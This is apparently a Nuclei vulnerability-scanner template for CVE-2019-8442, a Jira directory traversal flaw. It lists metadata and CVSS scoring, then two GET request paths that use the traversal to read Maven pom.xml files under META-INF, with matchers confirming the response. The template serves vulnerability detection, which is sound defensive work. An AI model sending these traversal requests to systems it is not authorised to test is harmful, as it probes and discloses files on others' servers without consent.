id: CVE-2019-8442

info:
  name: JIRA Directory Traversal
  author: Kishore Krishna (siLLyDaddy)
  severity: high
  description: The CachingResourceDownloadRewriteRule class in Jira before version 7.13.4, and from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to access
    files in the Jira webroot under the META-INF directory via a lax path access check.
  reference:
    - https://jira.atlassian.com/browse/JRASERVER-69241
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-8442
  tags: cve,cve2019,atlassian,jira,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml"
      - "{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - '<groupId>com.atlassian.jira</groupId>'
        part: body